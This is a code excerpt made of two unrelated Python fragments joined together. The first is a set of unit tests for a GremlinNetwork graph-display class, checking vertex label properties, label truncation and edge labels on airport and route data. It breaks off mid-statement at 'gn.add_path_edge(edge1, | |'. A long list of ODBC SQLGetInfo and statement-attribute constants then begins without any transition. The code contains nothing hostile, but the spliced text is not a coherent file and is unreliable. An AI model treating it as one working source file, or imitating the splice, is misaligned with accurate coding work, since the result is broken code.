gn = GremlinNetwork(display_property='code')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get(vertex1[T.id])
node2 = gn.graph.nodes.get(vertex2[T.id])
self.assertEqual(node1['label'], 'SEA')
self.assertEqual(node2['label'], 'USA')
def test_add_vertex_multiple_with_multiple_node_properties(self):
vertex1 = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
vertex2 = {
T.id: '2345',
T.label: 'country',
'type': 'Country',
'continent': 'NA',
'code': 'USA'
}
gn = GremlinNetwork(display_property='{"airport":"code","country":"continent"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get(vertex1[T.id])
node2 = gn.graph.nodes.get(vertex2[T.id])
self.assertEqual(node1['label'], 'SEA')
self.assertEqual(node2['label'], 'NA')
def test_add_vertex_with_label_length(self):
vertex = {
T.id: '1234',
T.label: 'Seattle-Tacoma International Airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_vertex_with_bracketed_label_and_label_length(self):
vertex = {
T.id: '1234',
T.label: "['Seattle-Tacoma International Airport']",
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_vertex_with_label_length_less_than_3(self):
vertex = {
T.id: '1234',
T.label: 'Seattle-Tacoma International Airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(label_max_length=-50)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], '...')
def test_add_vertex_with_node_property_string_and_label_length(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA',
'desc': 'Seattle-Tacoma International Airport'
}
gn = GremlinNetwork(display_property='{"airport":"desc"}', label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_vertex_with_node_property_json_and_label_length(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA',
'desc': 'Seattle-Tacoma International Airport'
}
gn = GremlinNetwork(display_property='desc', label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_explicit_type_single_edge_without_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork()
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_invalid_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='length')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_string_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='label')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_string_id(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], '1')
def test_add_explicit_type_single_edge_with_edge_property_json_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"route":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'v[2]')
def test_add_explicit_type_single_edge_with_edge_property_malformed_json_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"route":inV}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_json_invalid_key_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"road":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_json_invalid_value_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"route":"distance"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_multiple_edges_with_edge_property_string(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
vertex3 = Vertex(id='3')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='airway')
edge2 = Edge(id='2', outV=vertex2, inV=vertex3, label='road')
gn = GremlinNetwork(edge_display_property='id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
gn.add_path_edge(edge2)
edge_route = gn.graph.get_edge_data('1', '2')
edge_path = gn.graph.get_edge_data('2', '3')
self.assertEqual(edge_route['1']['label'], '1')
self.assertEqual(edge_path['2']['label'], '2')
def test_add_explicit_type_multiple_edges_with_edge_property_json_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
vertex3 = Vertex(id='3')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
edge2 = Edge(id='2', outV=vertex2, inV=vertex3, label='route')
gn = GremlinNetwork(edge_display_property='{"route":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
gn.add_path_edge(edge2)
edge_route = gn.graph.get_edge_data('1', '2')
edge_path = gn.graph.get_edge_data('2', '3')
self.assertEqual(edge_route['1']['label'], 'v[2]')
self.assertEqual(edge_path['2']['label'], 'v[3]')
def test_add_explicit_type_multiple_edges_with_edge_property_json_multiple_labels(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
vertex3 = Vertex(id='3')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='airway')
edge2 = Edge(id='2', outV=vertex2, inV=vertex3, label='road')
gn = GremlinNetwork(edge_display_property='{"airway":"inV","road":"id"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
gn.add_path_edge(edge2)
edge_route = gn.graph.get_edge_data('1', '2')
edge_path = gn.graph.get_edge_data('2', '3')
self.assertEqual(edge_route['1']['label'], 'v[2]')
self.assertEqual(edge_path['2']['label'], '2')
def test_add_single_edge_without_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork()
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_invalid_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='distance')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_string_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='T.label')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_string_id(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='T.id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], '1')
def test_add_single_edge_with_edge_property_json(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"route":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'v[2]')
def test_add_single_edge_with_edge_property_invalid_json(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"route":inV}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_json_invalid_key(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"distance":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_json_invalid_value(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"route":"foo"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_multiple_edges_with_edge_property_string(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
edge2 = {T.id: '2', T.label: 'route', 'outV': 'v[2]', 'inV': 'v[3]'}
gn = GremlinNetwork(edge_display_property='inV')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, | |
################################################################################
self.SQL_OAC_NONE = 0x0000
self.SQL_OAC_LEVEL1 = 0x0001
self.SQL_OAC_LEVEL2 = 0x0002
################################################################################
####SQLGetInfo - SQL_ODBC_INTERFACE_CONFORMANCE#################################
################################################################################
self.SQL_OIC_CORE = 1
self.SQL_OIC_LEVEL1 = 2
self.SQL_OIC_LEVEL2 = 3
################################################################################
####SQLGetInfo - SQL_ODBC_SAG_CLI_CONFORMANCE###################################
################################################################################
self.SQL_OSCC_NOT_COMPLIANT = 0x0000
self.SQL_OSCC_COMPLIANT = 0x0001
################################################################################
####SQLGetInfo - SQL_ODBC_SQL_CONFORMANCE#######################################
################################################################################
self.SQL_OSC_MINIMUM = 0x0000
self.SQL_OSC_CORE = 0x0001
self.SQL_OSC_EXTENDED = 0x0002
################################################################################
####SQLGetInfo - SQL_OWNER_USAGE################################################
################################################################################
self.SQL_OU_DML_STATEMENTS = 0x00000001
self.SQL_OU_PROCEDURE_INVOCATION = 0x00000002
self.SQL_OU_TABLE_DEFINITION = 0x00000004
self.SQL_OU_INDEX_DEFINITION = 0x00000008
self.SQL_OU_PRIVILEGE_DEFINITION = 0x00000010
################################################################################
####SQLGetInfo - SQL_PARAM_ARRAY_ROW_COUNTS#####################################
################################################################################
self.SQL_PARC_BATCH = 1
self.SQL_PARC_NO_BATCH = 2
################################################################################
####SQLGetInfo - SQL_PARAM_ARRAY_SELECTS########################################
################################################################################
self.SQL_PAS_BATCH = 1
self.SQL_PAS_NO_BATCH = 2
self.SQL_PAS_NO_SELECT = 3
################################################################################
####SQLGetInfo - SQL_POSITIONED_STATEMENTS######################################
################################################################################
self.SQL_PS_POSITIONED_DELETE = 0x00000001
self.SQL_PS_POSITIONED_UPDATE = 0x00000002
self.SQL_PS_SELECT_FOR_UPDATE = 0x00000004
################################################################################
####SQLGetInfo - SQL_QUALIFIER_LOCATION#########################################
################################################################################
self.SQL_QL_START = 0x0001
self.SQL_QL_END = 0x0002
################################################################################
####SQLGetInfo - SQL_CATALOG_LOCATION###########################################
################################################################################
self.SQL_CL_START = self.SQL_QL_START
self.SQL_CL_END = self.SQL_QL_END
################################################################################
####SQLGetInfo - SQL_QUALIFIER_USAGE############################################
################################################################################
self.SQL_QU_DML_STATEMENTS = 0x00000001
self.SQL_QU_PROCEDURE_INVOCATION = 0x00000002
self.SQL_QU_TABLE_DEFINITION = 0x00000004
self.SQL_QU_INDEX_DEFINITION = 0x00000008
self.SQL_QU_PRIVILEGE_DEFINITION = 0x00000010
################################################################################
####SQLGetInfo - SQL_CATALOG_USAGE##############################################
################################################################################
self.SQL_CU_DML_STATEMENTS = self.SQL_QU_DML_STATEMENTS
self.SQL_CU_PROCEDURE_INVOCATION = self.SQL_QU_PROCEDURE_INVOCATION
self.SQL_CU_TABLE_DEFINITION = self.SQL_QU_TABLE_DEFINITION
self.SQL_CU_INDEX_DEFINITION = self.SQL_QU_INDEX_DEFINITION
self.SQL_CU_PRIVILEGE_DEFINITION = self.SQL_QU_PRIVILEGE_DEFINITION
################################################################################
####SQLGetInfo - SQL_SCHEMA_USAGE###############################################
################################################################################
self.SQL_SU_DML_STATEMENTS = self.SQL_OU_DML_STATEMENTS
self.SQL_SU_PROCEDURE_INVOCATION = self.SQL_OU_PROCEDURE_INVOCATION
self.SQL_SU_TABLE_DEFINITION = self.SQL_OU_TABLE_DEFINITION
self.SQL_SU_INDEX_DEFINITION = self.SQL_OU_INDEX_DEFINITION
self.SQL_SU_PRIVILEGE_DEFINITION = self.SQL_OU_PRIVILEGE_DEFINITION
################################################################################
####SQLGetInfo - SQL_SCROLL_OPTIONS#############################################
################################################################################
self.SQL_SO_FORWARD_ONLY = 0x00000001
self.SQL_SO_KEYSET_DRIVEN = 0x00000002
self.SQL_SO_DYNAMIC = 0x00000004
self.SQL_SO_MIXED = 0x00000008
self.SQL_SO_STATIC = 0x00000010
################################################################################
####SQLGetInfo - SQL_SQL_CONFORMANCE############################################
################################################################################
self.SQL_SC_SQL92_ENTRY = 0x00000001
self.SQL_SC_FIPS127_2_TRANSITIONAL = 0x00000002
self.SQL_SC_SQL92_INTERMEDIATE = 0x00000004
self.SQL_SC_SQL92_FULL = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_DATETIME_FUNCTIONS###################################
################################################################################
self.SQL_SDF_CURRENT_DATE = 0x00000001
self.SQL_SDF_CURRENT_TIME = 0x00000002
self.SQL_SDF_CURRENT_TIMESTAMP = 0x00000004
################################################################################
####SQLGetInfo - SQL_SQL92_FOREIGN_KEY_DELETE_RULE##############################
################################################################################
self.SQL_SFKD_CASCADE = 0x00000001
self.SQL_SFKD_NO_ACTION = 0x00000002
self.SQL_SFKD_SET_DEFAULT = 0x00000004
self.SQL_SFKD_SET_NULL = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_FOREIGN_KEY_UPDATE_RULE##############################
################################################################################
self.SQL_SFKU_CASCADE = 0x00000001
self.SQL_SFKU_NO_ACTION = 0x00000002
self.SQL_SFKU_SET_DEFAULT = 0x00000004
self.SQL_SFKU_SET_NULL = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_GRANT################################################
################################################################################
self.SQL_SG_USAGE_ON_DOMAIN = 0x00000001
self.SQL_SG_USAGE_ON_CHARACTER_SET = 0x00000002
self.SQL_SG_USAGE_ON_COLLATION = 0x00000004
self.SQL_SG_USAGE_ON_TRANSLATION = 0x00000008
self.SQL_SG_WITH_GRANT_OPTION = 0x00000010
self.SQL_SG_DELETE_TABLE = 0x00000020
self.SQL_SG_INSERT_TABLE = 0x00000040
self.SQL_SG_INSERT_COLUMN = 0x00000080
self.SQL_SG_REFERENCES_TABLE = 0x00000100
self.SQL_SG_REFERENCES_COLUMN = 0x00000200
self.SQL_SG_SELECT_TABLE = 0x00000400
self.SQL_SG_UPDATE_TABLE = 0x00000800
self.SQL_SG_UPDATE_COLUMN = 0x00001000
################################################################################
####SQLGetInfo - SQL_SQL92_NUMERIC_VALUE_FUNCTIONS##############################
################################################################################
self.SQL_SNVF_BIT_LENGTH = 0x00000001
self.SQL_SNVF_CHAR_LENGTH = 0x00000002
self.SQL_SNVF_CHARACTER_LENGTH = 0x00000004
self.SQL_SNVF_EXTRACT = 0x00000008
self.SQL_SNVF_OCTET_LENGTH = 0x00000010
self.SQL_SNVF_POSITION = 0x00000020
################################################################################
####SQLGetInfo - SQL_SQL92_PREDICATES###########################################
################################################################################
self.SQL_SP_EXISTS = 0x00000001
self.SQL_SP_ISNOTNULL = 0x00000002
self.SQL_SP_ISNULL = 0x00000004
self.SQL_SP_MATCH_FULL = 0x00000008
self.SQL_SP_MATCH_PARTIAL = 0x00000010
self.SQL_SP_MATCH_UNIQUE_FULL = 0x00000020
self.SQL_SP_MATCH_UNIQUE_PARTIAL = 0x00000040
self.SQL_SP_OVERLAPS = 0x00000080
self.SQL_SP_UNIQUE = 0x00000100
self.SQL_SP_LIKE = 0x00000200
self.SQL_SP_IN = 0x00000400
self.SQL_SP_BETWEEN = 0x00000800
self.SQL_SP_COMPARISON = 0x00001000
self.SQL_SP_QUANTIFIED_COMPARISON = 0x00002000
################################################################################
####SQLGetInfo - SQL_SQL92_RELATIONAL_JOIN_OPERATORS############################
################################################################################
self.SQL_SRJO_CORRESPONDING_CLAUSE = 0x00000001
self.SQL_SRJO_CROSS_JOIN = 0x00000002
self.SQL_SRJO_EXCEPT_JOIN = 0x00000004
self.SQL_SRJO_FULL_OUTER_JOIN = 0x00000008
self.SQL_SRJO_INNER_JOIN = 0x00000010
self.SQL_SRJO_INTERSECT_JOIN = 0x00000020
self.SQL_SRJO_LEFT_OUTER_JOIN = 0x00000040
self.SQL_SRJO_NATURAL_JOIN = 0x00000080
self.SQL_SRJO_RIGHT_OUTER_JOIN = 0x00000100
self.SQL_SRJO_UNION_JOIN = 0x00000200
################################################################################
####SQLGetInfo - SQL_SQL92_REVOKE###############################################
################################################################################
self.SQL_SR_USAGE_ON_DOMAIN = 0x00000001
self.SQL_SR_USAGE_ON_CHARACTER_SET = 0x00000002
self.SQL_SR_USAGE_ON_COLLATION = 0x00000004
self.SQL_SR_USAGE_ON_TRANSLATION = 0x00000008
self.SQL_SR_GRANT_OPTION_FOR = 0x00000010
self.SQL_SR_CASCADE = 0x00000020
self.SQL_SR_RESTRICT = 0x00000040
self.SQL_SR_DELETE_TABLE = 0x00000080
self.SQL_SR_INSERT_TABLE = 0x00000100
self.SQL_SR_INSERT_COLUMN = 0x00000200
self.SQL_SR_REFERENCES_TABLE = 0x00000400
self.SQL_SR_REFERENCES_COLUMN = 0x00000800
self.SQL_SR_SELECT_TABLE = 0x00001000
self.SQL_SR_UPDATE_TABLE = 0x00002000
self.SQL_SR_UPDATE_COLUMN = 0x00004000
################################################################################
####SQLGetInfo - SQL_SQL92_ROW_VALUE_CONSTRUCTOR################################
################################################################################
self.SQL_SRVC_VALUE_EXPRESSION = 0x00000001
self.SQL_SRVC_NULL = 0x00000002
self.SQL_SRVC_DEFAULT = 0x00000004
self.SQL_SRVC_ROW_SUBQUERY = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_STRING_FUNCTIONS#####################################
################################################################################
self.SQL_SSF_CONVERT = 0x00000001
self.SQL_SSF_LOWER = 0x00000002
self.SQL_SSF_UPPER = 0x00000004
self.SQL_SSF_SUBSTRING = 0x00000008
self.SQL_SSF_TRANSLATE = 0x00000010
self.SQL_SSF_TRIM_BOTH = 0x00000020
self.SQL_SSF_TRIM_LEADING = 0x00000040
self.SQL_SSF_TRIM_TRAILING = 0x00000080
################################################################################
####SQLGetInfo - SQL_SQL92_VALUE_EXPRESSIONS####################################
################################################################################
self.SQL_SVE_CASE = 0x00000001
self.SQL_SVE_CAST = 0x00000002
self.SQL_SVE_COALESCE = 0x00000004
self.SQL_SVE_NULLIF = 0x00000008
################################################################################
####SQLGetInfo - SQL_STANDARD_CLI_CONFORMANCE###################################
################################################################################
self.SQL_SCC_XOPEN_CLI_VERSION1 = 0x00000001
self.SQL_SCC_ISO92_CLI = 0x00000002
################################################################################
####SQLGetInfo - SQL_STATIC_SENSITIVITY#########################################
################################################################################
self.SQL_SS_ADDITIONS = 0x00000001
self.SQL_SS_DELETIONS = 0x00000002
self.SQL_SS_UPDATES = 0x00000004
################################################################################
####SQLGetInfo - SQL_SUBQUERIES#################################################
################################################################################
self.SQL_SQ_COMPARISON = 0x00000001
self.SQL_SQ_EXISTS = 0x00000002
self.SQL_SQ_IN = 0x00000004
self.SQL_SQ_QUANTIFIED = 0x00000008
self.SQL_SQ_CORRELATED_SUBQUERIES = 0x00000010
################################################################################
####SQLGetInfo - SQL_SYSTEM_FUNCTIONS###########################################
################################################################################
self.SQL_FN_SYS_USERNAME = 0x00000001
self.SQL_FN_SYS_DBNAME = 0x00000002
self.SQL_FN_SYS_IFNULL = 0x00000004
################################################################################
####SQLGetInfo - SQL_STRING_FUNCTIONS###########################################
################################################################################
self.SQL_FN_STR_CONCAT = 0x00000001
self.SQL_FN_STR_INSERT = 0x00000002
self.SQL_FN_STR_LEFT = 0x00000004
self.SQL_FN_STR_LTRIM = 0x00000008
self.SQL_FN_STR_LENGTH = 0x00000010
self.SQL_FN_STR_LOCATE = 0x00000020
self.SQL_FN_STR_LCASE = 0x00000040
self.SQL_FN_STR_REPEAT = 0x00000080
self.SQL_FN_STR_REPLACE = 0x00000100
self.SQL_FN_STR_RIGHT = 0x00000200
self.SQL_FN_STR_RTRIM = 0x00000400
self.SQL_FN_STR_SUBSTRING = 0x00000800
self.SQL_FN_STR_UCASE = 0x00001000
self.SQL_FN_STR_ASCII = 0x00002000
self.SQL_FN_STR_CHAR = 0x00004000
self.SQL_FN_STR_DIFFERENCE = 0x00008000
self.SQL_FN_STR_LOCATE_2 = 0x00010000
self.SQL_FN_STR_SOUNDEX = 0x00020000
self.SQL_FN_STR_SPACE = 0x00040000
self.SQL_FN_STR_BIT_LENGTH = 0x00080000
self.SQL_FN_STR_CHAR_LENGTH = 0x00100000
self.SQL_FN_STR_CHARACTER_LENGTH = 0x00200000
self.SQL_FN_STR_OCTET_LENGTH = 0x00400000
self.SQL_FN_STR_POSITION = 0x00800000
################################################################################
####SQLGetInfo - SQL_TIMEDATE_ADD_INTERVALS#####################################
####SQLGetInfo - SQL_TIMEDATE_DIFF_INTERVALS####################################
################################################################################
self.SQL_FN_TSI_FRAC_SECOND = 0x00000001
self.SQL_FN_TSI_SECOND = 0x00000002
self.SQL_FN_TSI_MINUTE = 0x00000004
self.SQL_FN_TSI_HOUR = 0x00000008
self.SQL_FN_TSI_DAY = 0x00000010
self.SQL_FN_TSI_WEEK = 0x00000020
self.SQL_FN_TSI_MONTH = 0x00000040
self.SQL_FN_TSI_QUARTER = 0x00000080
self.SQL_FN_TSI_YEAR = 0x00000100
################################################################################
####SQLGetInfo - SQL_TIMEDATE_FUNCTIONS#########################################
################################################################################
self.SQL_FN_TD_NOW = 0x00000001
self.SQL_FN_TD_CURDATE = 0x00000002
self.SQL_FN_TD_DAYOFMONTH = 0x00000004
self.SQL_FN_TD_DAYOFWEEK = 0x00000008
self.SQL_FN_TD_DAYOFYEAR = 0x00000010
self.SQL_FN_TD_MONTH = 0x00000020
self.SQL_FN_TD_QUARTER = 0x00000040
self.SQL_FN_TD_WEEK = 0x00000080
self.SQL_FN_TD_YEAR = 0x00000100
self.SQL_FN_TD_CURTIME = 0x00000200
self.SQL_FN_TD_HOUR = 0x00000400
self.SQL_FN_TD_MINUTE = 0x00000800
self.SQL_FN_TD_SECOND = 0x00001000
self.SQL_FN_TD_TIMESTAMPADD = 0x00002000
self.SQL_FN_TD_TIMESTAMPDIFF = 0x00004000
self.SQL_FN_TD_DAYNAME = 0x00008000
self.SQL_FN_TD_MONTHNAME = 0x00010000
self.SQL_FN_TD_CURRENT_DATE = 0x00020000
self.SQL_FN_TD_CURRENT_TIME = 0x00040000
self.SQL_FN_TD_CURRENT_TIMESTAMP = 0x00080000
self.SQL_FN_TD_EXTRACT = 0x00100000
################################################################################
####SQLGetInfo - SQL_TXN_ISOLATION_OPTION#######################################
################################################################################
self.SQL_TXN_VERSIONING = 0x00000010
################################################################################
####SQLGetInfo - SQL_UNION######################################################
################################################################################
self.SQL_U_UNION = 0x00000001
self.SQL_U_UNION_ALL = 0x00000002
################################################################################
####SQLGetInfo - SQL_UNION_STATEMENT############################################
################################################################################
self.SQL_US_UNION = self.SQL_U_UNION
self.SQL_US_UNION_ALL = self.SQL_U_UNION_ALL
################################################################################
####SQLGetStmtAttr - ODBC 2.x attributes########################################
################################################################################
self.SQL_QUERY_TIMEOUT = 0
self.SQL_MAX_ROWS = 1
self.SQL_NOSCAN = 2
self.SQL_MAX_LENGTH = 3
self.SQL_ASYNC_ENABLE = 4
self.SQL_BIND_TYPE = 5
self.SQL_CURSOR_TYPE = 6
self.SQL_CONCURRENCY = 7
self.SQL_KEYSET_SIZE = 8
self.SQL_ROWSET_SIZE = 9
self.SQL_SIMULATE_CURSOR = 10
self.SQL_RETRIEVE_DATA = 11
self.SQL_USE_BOOKMARKS = 12
self.SQL_GET_BOOKMARK = 13
self.SQL_ROW_NUMBER = 14
################################################################################
####SQLGetStmtAttr - ODBC 3.x attributes########################################
################################################################################
self.SQL_ATTR_ASYNC_ENABLE = 4
self.SQL_ATTR_CONCURRENCY = self.SQL_CONCURRENCY
self.SQL_ATTR_CURSOR_TYPE = self.SQL_CURSOR_TYPE
self.SQL_ATTR_ENABLE_AUTO_IPD = 15
self.SQL_ATTR_FETCH_BOOKMARK_PTR = 16
self.SQL_ATTR_KEYSET_SIZE = self.SQL_KEYSET_SIZE
self.SQL_ATTR_MAX_LENGTH = self.SQL_MAX_LENGTH
self.SQL_ATTR_MAX_ROWS = self.SQL_MAX_ROWS
self.SQL_ATTR_NOSCAN = self.SQL_NOSCAN
self.SQL_ATTR_PARAM_BIND_OFFSET_PTR = 17
self.SQL_ATTR_PARAM_BIND_TYPE = 18
self.SQL_ATTR_PARAM_OPERATION_PTR = 19
self.SQL_ATTR_PARAM_STATUS_PTR = 20
self.SQL_ATTR_PARAMS_PROCESSED_PTR = 21
self.SQL_ATTR_PARAMSET_SIZE = 22
self.SQL_ATTR_QUERY_TIMEOUT = self.SQL_QUERY_TIMEOUT
self.SQL_ATTR_RETRIEVE_DATA = self.SQL_RETRIEVE_DATA
self.SQL_ATTR_ROW_BIND_OFFSET_PTR = 23
self.SQL_ATTR_ROW_BIND_TYPE = self.SQL_BIND_TYPE
self.SQL_ATTR_ROW_NUMBER = self.SQL_ROW_NUMBER
self.SQL_ATTR_ROW_OPERATION_PTR = 24
self.SQL_ATTR_ROW_STATUS_PTR = 25
self.SQL_ATTR_ROWS_FETCHED_PTR = 26
self.SQL_ATTR_ROW_ARRAY_SIZE = 27
self.SQL_ATTR_SIMULATE_CURSOR = self.SQL_SIMULATE_CURSOR
self.SQL_ATTR_USE_BOOKMARKS = self.SQL_USE_BOOKMARKS
self.SQL_STMT_OPT_MAX = self.SQL_ROW_NUMBER
self.SQL_STMT_OPT_MIN = self.SQL_QUERY_TIMEOUT
################################################################################
####SQLGetStmtAttr - SQL_ATTR_ASYNC_ENABLE######################################
################################################################################
self.SQL_ASYNC_ENABLE_OFF = 0
self.SQL_ASYNC_ENABLE_ON = 1
self.SQL_ASYNC_ENABLE_DEFAULT = self.SQL_ASYNC_ENABLE_OFF
################################################################################
####SQLGetStmtAttr - SQL_ATTR_PARAM_BIND_TYPE###################################
################################################################################
self.SQL_PARAM_BIND_BY_COLUMN = 0
